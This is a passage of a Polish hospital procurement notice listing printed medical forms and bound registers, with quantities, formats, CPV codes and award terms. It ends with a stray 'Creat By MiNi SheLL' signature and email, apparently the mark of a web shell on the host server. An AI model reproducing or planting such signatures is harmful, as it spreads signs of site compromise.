146.	362	F 0080 nfz	Zlecenie na zapotrzebowanie w wyroby medyczne będące przedmiotami ortopedycznymi i środkami pomocniczymi	A4 dwust 	38
147.	364	S-17-LC	Zlecenie wykonania badań mikrobiologicznych w pracowni bakteriologicznej SP ZOZ Krotoszyn	A5	400
148.	365	F 0089	Zlecenie wykonania konsultacji	A5 kopia	156
149.	386	S-08-LC	Skierowanie do laboratorium 	A4 bl	1 340
150.	394	F 0112 AOS	Waga pacjenta- POR.DIABET.	A5	27
151.	395	F 0110 AOS	Karta realizacji edukacji zdrowotnej pacjenta por.diabet.		14
152.	396	F 0023	Karta wyników badań laboratoryjnych-POR.DIABET.	A4	41
153.	397	F 0114 AOS	Dieta pacjenta-POR.DIABET.	A4	14
154.	398	F 0024	Karta wyników dodatkowych badań laboratoryjnych /diabetolog/	A4	41
155.	399	F 0115 AOS	Karta dawkowania leków-POR.DIABET.	A4	21
156.	401	F 0117 AOS	Profilaktyka stopy cukrzycowej-POR.DIABET.	A5	14
157.	414	F 0139	Karta kontrolna testu biologicznego do sterylizacji parą wodną	A5	7
158.	415	PL-04A	Informacja karta zlecen lekarskich (oddz rehabilitacji)	A3 dwust	27
159.	416	PL-43	Historia rehabilitacji	A3 dwustr	11
160.	417	PL-45	Karta oceny przebiegu programu rehabilitacji	A4	11
161.	418	PL-44	Karta zleceń zabiegów fizjoterapeutycznych	A4	11
162.	419	F 0027 A	Zestawienie żywieniowe oddziałów na dzień	A4	6
163.	423	F 0131 POŁ-GIN	Informacja dla pacjentki oraz formularz świadomej zgody na operacyjne rozwiązanie ciąży metodą cięcia cesarskiego	A3 dwustr	14
164.	424	F 0037 CPMiPZ	Ankieta dla mammografii diagnostycznej / płatnej	A4	14
165.	425	S-06	Skierowanie do  	A6 dwust	14
166.	w trakcie	nowy	Standardowa klasyfikacja neurologiczna uszkodzeń rdzenia kręgowego	A4	11
167.	81	NOWY	Karta oceny świadczeniobiorcy kierowanego do zakładu opiekuńczego (skala Barhel)	A4	7
168.		Zał. nr 1 instr.3 DZG	Zamówienie (mag. chem., med.)	A4 dwust	20
169.	420		druk- po odbiór wyniku mammografii	A6	55
170.	421		druk- pacjentka została poinformowana o zakwalifikowaniu się do etapu pogłębionej diagnostyki	A5	15
171.		Dz.Fin-Księgowy 026	Arkusz spisu z natury	A4 bl kopia	27
172.		Dz.Fin-Księgowy 017	BANKOWY DOWÓD WPŁATY WP	A6 kopia2kolory bl	54
173.		Dz.Fin-Księgowy 018	DOWÓD WPŁATY KP	A6 bl kopia	1 000
174.		AD 003	KARTA EWIDENCJI CZASU PRACY PRACOWNIKA	A4 dwust sztywna	11
175.		AD 022	KARTA OBIEGOWA ZMIANY	A6 dwust bl	14
176.		AD 005	LISTA OBECNOŚCI W PRACY	A4	21
177.		AD 004	PLAN URLOPÓW WYPOCZYNKOWYCH	2/3 A4 bl	21
178.		AD 006	POLECENIE WYJAZDU SŁUŻBOWEGO	A5 bl dwust	14
179.		Dz.Fin-Księgowy 009	Polecenie księgowania PK	A4 bl kopia/A5 bl kopia	41
180.		AD 001	ROCZNA KARTA EWIDENCJI OBECNOŚCI W PRACY	A5 sztywna dwustr	14
181.		Instr.9. Z-01	ZAPOTRZEBOWANIE NA ZAKUP	A4 bl	27
182.		Instr. 1. Dz.G.  Z-01	ZAPOTRZEBOWANIE NA ARTYKUŁY PAPIERNICZE I DRUKI 	A4 bl	27
183.			ZAPOTRZEBOWANIE NA ARTYKUŁY PAPIERNICZE I DRUKI 	A5 bl	27
184.		Instr.2 Dz.G.A	Magazyn wyda	A5 bl	108
185.		Instr.2 Dz.G.B	Magazyn przyjmie	A5 bl	14
186.		AD 051	Prośba o udostępnienie dokumentacji	A4 bl	54
187.		AD 079	Karta drogowa /z numeracją	A5 bl numeracja	67
188.			Zamówienie na magazyn chemiczny i medyczny	A4 bl 	27
189.			Oświadczenie 	A5	160
190.		PL-47	Karta zabiegowa (Oddział Rehabilitacji)	A3 dwustronne	30
W pozycjach, w których są sztuki należy podać ceny netto za 100 szt. z odpowiednim przeliczeniem ilości w kolumnie A (nie dotyczy wyceny bloczków)									
									
1 bloczek = 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KSIĄŻKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	21	K.002	Dziennik pracy stacji pogotowia ratunkowego / format A4, szyta,sztywna 100 kartek	A4	27
2.	23	K.004	Dziennik ruchu chorych oddziału / format A4, szyta,sztywna 100 kartek	A4	47
3.	112	K.006	Książeczka szczepień / A5 standard	A5	1 100
4.	113	K.007	Książeczka zdrowia dziecka	A5 30kartek	1 100
5.	114	K.008	Książęczka nr . chorego na cukrzycę / format A6, spinana 8 kartek	A6	3 400
6.	115	K.011	Książka badań przeciwciał  i kwalifikacji do podania immunoglobuliny anty-d / pozioma, 200kartek,szyta, sztywna	A4	3
7.	117	K.083	Księga TK A4 /100 kartek opr. sztywna	A4	20
8.	118	K.071	Księga dokonanych  operacji / format A4, kopia perferowana, 200 kartek	A4 kopia	28
9.	120	K.020	Książka główna/diagnostyczna- Por K. / format A4, szyta,sztywna 100 kartek	A4	21
10.	121	K.057	Książka zabiegowa - Por K. / format A4, szyta,sztywna 100 kartek	A4	16
11.	122	K.055	Książka wymazów cytologicznych- Por.K /A4 200 kart opr.sztyw.	A4	8
12.	123	K.014	Książka ewidencji dializ / sztywna, nici, A4, 100 kartek 	A4	4
13.	125	K.010	Książka badań grup krwi / pozioma, 200kartek,szyta, sztywna	A4	5
14.	126	K.005	Karta fenyloketonuria hypotyreoza / Oddz. Nowor./ sztywna,60kartek,szyta,pionowa	A4	2
15.	128	K.023	Książka hemodializ  / sztywna,zszywacze, A4, 80 kartek, dziury do segreg.,pieczątka zgoda na zabiegi HD	A4	134
16.	129	K.029	Książka kontroli środków odurzających i psychotropowych /A4 MZF-50 numeracja + otwory	 numer str, otwory	40
17.	130	K.031	Książka oddz. noworodkowego/ sztywna,szyta,pozioma,100 kartek	A4	5
18.	131	K.038	Książka pracowni analitycznej - bad. Moczu / 200kartek,szyta,sztywna	A4	23
19.	132	K.037	Książka pracowni analitycznej - bad. Kału / 200kartek,szyta,sztywna	A4	8
20.	133	K.042	Książka pracowni cytologicznej /A4 200 kartek szyta	A4	11
21.	134	K.009	Książka - karta kontroli dokładności /A4 200 kartek szyta	A4	7
22.	135	K.045	Książka pracowni serologicznej /A4200 kartek szyta	A4	16
23.	136	K.046	Książka profilaktyka konfliktu Rh - GIN-POŁ /A4 200 kartek szyta	A4	8
24.	137	K.033	Książka opatrunków /A4 200 kart szyta	A4	32
25.	138	K.047	Książka prób zgodności / pozioma,200kartek, szyta,sztywna	A4	4
26.	139	K.048	Książka przychodów i rozchodów preparatów krwiopochodnych banku krwi / pozioma, szyta,sztywna, 200 kartek	A4	3
27.	140	K.050	Książka raportów lekarskich / format A4, szyta,sztywna 100 kartek numeracja stron, otwory	A4 nr stron, otwory	44
28.	426	K.044	Książka pracowni RTG - mammografia profilaktyczna / sztywna, szyta, A4	A4	8
29.	141	K.081	Księga RTG /A4 100 kare, sztywna, szyta	A4	40
30.	142	K.051	Książka sterylizacji /A4 100 kart szyta sztywna opr	A4	5
31.	148	K.053	Książka transfuzyjna /A4 10 kart opr sztywna	A4	8
32.	150	K.056	Książka zabiegowa - Por Diabet./ format A4, szyta,sztywna 100 kartek	A4	8
33.	153	K.061	Książki -ruchu chorych- por.specjalistyczne / format A4, szyta,sztywna 100 kartek	A4	52
34.	159	K.079	Księga pracowni  bakteriologicznej / 200kartek,szyta,sztywna, format 2/3A3	2/3 A3 	58
35.	168	K.058	Książka zabiegów leczniczych zał nr 6 (ZLU) / a3 200stron,szyta	A3	15
36.	213	K.086	Raport dyspozytorski / format A4, szyta, sztywna	A4	3
37.	250	K 89	Skorowidz do księgi głównej szpitala	2/3 A4	13
38.	334	Instr.32 Z-02	Zeszyt badań histopatologicznych /A5 60kart	A5	3
39.	375	Pr.31 Z-02	Zeszyt odbioru wyników badań laboratoryjnych / 100kartek,sztywny	A4	40
40.	381	K.041	Książka pracowni biochemicznej / 200kartek,szyta,sztywna	A4	27
41.	389	K.049	Książka PSA / 200kartek,szyta,sztywna	A4	8
42.	391	K.021	Książka HBS / 200kartek,szyta,sztywna	A4	8
43.	393	K.022	Książka HCV / 200kartek,szyta,sztywna	A4	8
44.	402	K.080	Księga pracowni analitycznej / 200kartek,szyta,sztywna	A4	67
45.	404	K.039	Książka pracowni analitycznej CARDIAk / 200kartek,szyta,sztywna	A4	5
46.	405	K.024	Książka hormony płciowe / 200kartek,szyta,sztywna	A4	5
47.	406	K.025	Książka koagulologia / 200kartek,szyta,sztywna	A4	7
48.	390	K.012	Książka CEA / 200kartek,szyta,sztywna	A4	19
49.	162	K.013	Książka dokonanych badań i zabiegów endoskopii / format A4, szyta,sztywna 100 kartek	A4	40
50.	166	K.016	Książka ewidencji pacjentów w Prac.Endoskopii / format A4, szyta,sztywna 100 kartek	A4	5
51.	153	K.019	Książka główna przychodni / format A4, szyta,sztywna 100 kartek	A4	2
52.	stand.	K.035	Książka pocztowa nadawcza CPMIPZ/kancelaria	A4	16
53.	403	K.040	Książka pracowni analitycznej hormony tarczycy / 200kartek,szyta,sztywna	A4	7
54.	154	K.062	Książki  -ruchu chorych -(przyjęć i wypisów  szpitala) /A4 100 kartek szyta		11
55.	155	K.063	Książki -ruchu chorych- (przyjęć i wypisów oddziału) /A4 150 kartek szyta	A4	55
56.	156	K.064	Książki raportów pielęniarskich /A4 100 kartek szyta	A4	328
57.	157	K.065	Książka zabiegowa oddziału /A4 100 kartek, szyta	A4	194
58.	158	K.066	Książki zabiegowe (iniekcji i zabiegów por.ambul.) /A4 100 kartek szyta	A4	13
59.	164	K.067	ksiega zabiegów oddziału Poł-Gin /A4 200 kartek szyta	A4	7
60.	402	K.068	Księga analityczna /A4 200 kartek szyta	A4	37
61.	stand.	K.072	Księga druków ścisłego zarachowania /A4 40 kartek	A4	13
62.		K.076	Księga inwentarzowa / A4 200kartek,szyta,sztywna	A4	30
63.	165	K.077	Księga kontowa /A4 40 kart opr. Miękka	A4	40
64.	stand.	K.078	Księga pism / format A4, szyta,sztywna 100 kartek	A4	20
65.	163	K.082	Księga Sali porodowej /A4 200 kartek szyta	A4	3
66.	151	K.084	Księga zabiegów leczniczych ZLU / A3 200kartek,szyta,sztywna	A3	7
67.		*	Dzienny rejestr pracy stacji dializ (uzdatniania wody) / sztywna,nici, A4, 50kartek	A4	5
68.		*	Zeszyt potwierdzający odbiór dokumentów /A4 60 kart	A5	3
69.			Książka pomiaru temperatury / sztywna, nici, A4, 30kartek	A4	3
Poz. 3 , poz. 4, poz. 5  - oprawa miękka, gramatura min. 200g/m2.			
			
Książka 100 kartkowa - oprawa miękka, gramatura oprawy min. 250 g/m2.			
			
		
Pozostałe książki - oprawa twarda, gramatura oprawy min. 900g/m2.		
		
Książki 100 i mniej kartkowe powinny być zszyte zszywką metalową, natomiast książki powyżej 100 kartek powinny być zszyte nićmi i klejone..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 15.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com